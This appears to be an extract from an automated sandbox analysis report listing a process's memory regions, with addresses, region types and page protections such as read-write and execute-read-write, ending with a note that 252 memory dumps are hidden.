page read and write
|
|
|
|
2A04000
|
heap private
|
page read and write
|
|
|
|
1FCC000
|
unkown
|
page readonly
|
|
|
|
2EEB000
|
unkown
|
page read and write
|
|
|
|
2040000
|
heap private
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
31CA000
|
unkown
|
page read and write
|
|
|
|
2020000
|
unkown
|
page readonly
|
|
|
|
2E67000
|
unkown
|
page read and write
|
|
|
|
28EF000
|
unkown
|
page read and write
|
|
|
|
207B000
|
heap private
|
page read and write
|
|
|
|
372000
|
heap default
|
page read and write
|
|
|
|
2FC0000
|
unkown
|
page read and write
|
|
|
|
1B5C7000
|
unkown
|
page read and write
|
|
|
|
2E90000
|
unkown
|
page read and write
|
|
|
|
1B5F4000
|
unkown
|
page read and write
|
|
|
|
150000
|
unkown
|
page readonly
|
|
|
|
315D000
|
unkown
|
page read and write
|
|
|
|
350F000
|
unkown
|
page read and write
|
|
|
|
1D6000
|
unkown
|
page read and write
|
|
|
|
7FF00022000
|
unkown
|
page execute and read and write
|
|
|
|
1AC80000
|
unkown
|
page read and write
|
|
|
|
2EA6000
|
unkown
|
page read and write
|
|
|
|
2A00000
|
heap private
|
page read and write
|
|
|
|
12C4C000
|
unkown
|
page read and write
|
|
|
|
7FF00270000
|
unkown
|
page execute and read and write
|
|
|
|
2FDC000
|
unkown
|
page read and write
|
|
|
|
1C00000
|
unkown
|
page read and write
|
|
|
|
312A000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2045000
|
heap private
|
page read and write
|
|
|
|
2F89000
|
unkown
|
page read and write
|
|
|
|
110000
|
unkown
|
page read and write
|
|
|
|
2E64000
|
unkown
|
page read and write
|
|
|
|
104000
|
heap private
|
page read and write
|
|
|
|
1BBF0000
|
heap private
|
page read and write
|
|
|
|
7FF001A0000
|
unkown
|
page read and write
|
|
|
|
2F8F000
|
unkown
|
page read and write
|
|
|
|
2C57000
|
unkown
|
page read and write
|
|
|
|
3541000
|
unkown
|
page read and write
|
|
|
|
3E8000
|
heap default
|
page read and write
|
|
|
|
2EFC000
|
unkown
|
page read and write
|
|
|
|
3767000
|
unkown
|
page read and write
|
|
|
|
2AF0000
|
heap private
|
page execute and read and write
|
|
|
|
2926000
|
unkown
|
page read and write
|
|
|
|
60000
|
unkown
|
page readonly
|
|
|
|
354E000
|
unkown
|
page read and write
|
|
|
|
2FFC000
|
unkown
|
page read and write
|
|
|
|
1E80000
|
heap private
|
page execute and read and write
|
|
|
|
7FF000D0000
|
unkown
|
page read and write
|
|
|
|
7FF001E0000
|
unkown
|
page read and write
|
|
|
|
E0000
|
unkown
|
page read and write
|
|
|
|
2E5E000
|
unkown
|
page read and write
|
|
|
|
2C81000
|
unkown
|
page read and write
|
|
|
|
3538000
|
unkown
|
page read and write
|
|
|
|
2E8D000
|
unkown
|
page read and write
|
|
|
|
2F5A000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
7FF001C0000
|
unkown
|
page read and write
|
|
|
|
2FBD000
|
unkown
|
page read and write
|
|
|
|
1B510000
|
unkown
|
page read and write
|
|
|
|
2C5A000
|
unkown
|
page read and write
|
|
|
|
2EE2000
|
unkown
|
page read and write
|
|
|
|
7FF00200000
|
unkown
|
page execute and read and write
|
|
|
|
12E70000
|
unkown
|
page read and write
|
|
|
|
1FC0000
|
unkown
|
page readonly
|
|
|
|
1F90000
|
unkown
|
page readonly
|
|
|
|
2F61000
|
unkown
|
page read and write
|
|
|
|
1B400000
|
heap private
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
7FF00250000
|
unkown
|
page execute and read and write
|
|
|
|
F0000
|
unkown
|
page write copy
|
|
|
|
2FD2000
|
unkown
|
page read and write
|
|
|
|
1BB20000
|
heap private
|
page read and write
|
|
|
|
1F00000
|
unkown
|
page read and write
|
|
|
|
2FE2000
|
unkown
|
page read and write
|
|
|
|
2F6E000
|
unkown
|
page read and write
|
|
|
|
1D5000
|
unkown
|
page read and write | page guard
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2ABA000
|
heap private
|
page execute and read and write
|
|
|
|
2F67000
|
unkown
|
page read and write
|
|
|
|
1C750000
|
unkown
|
page readonly
|
|
|
|
34F6000
|
unkown
|
page read and write
|
|
|
|
7FF001E7000
|
unkown
|
page read and write
|
|
|
|
7FF001F0000
|
unkown
|
page read and write
|
|
|
|
2EE7000
|
unkown
|
page read and write
|
|
|
|
3163000
|
unkown
|
page read and write
|
|
|
|
2820000
|
unkown
|
page readonly
|
|
|
|
353B000
|
unkown
|
page read and write
|
|
|
|
7FF00240000
|
unkown
|
page execute and read and write
|
|
|
|
2EAA000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
7FF00160000
|
unkown
|
page execute and read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2F09000
|
unkown
|
page read and write
|
|
|
|
1B5C2000
|
unkown
|
page read and write
|
|
|
|
7FF00150000
|
unkown
|
page read and write
|
|
|
|
35CC000
|
unkown
|
page read and write
|
|
|
|
2F40000
|
unkown
|
page read and write
|
|
|
|
2F8C000
|
unkown
|
page read and write
|
|
|
|
3420000
|
unkown
|
page read and write
|
|
|
|
1FC7000
|
unkown
|
page readonly
|
|
|
|
7FF001B0000
|
unkown
|
page execute and read and write
|
|
|
|
2FBA000
|
unkown
|
page read and write
|
|
|
|
3528000
|
unkown
|
page read and write
|
|
|
|
1CAF0000
|
heap private
|
page read and write
|
|
|
|
35B7000
|
unkown
|
page read and write
|
|
There are 252 hidden memdumps, click here to show them.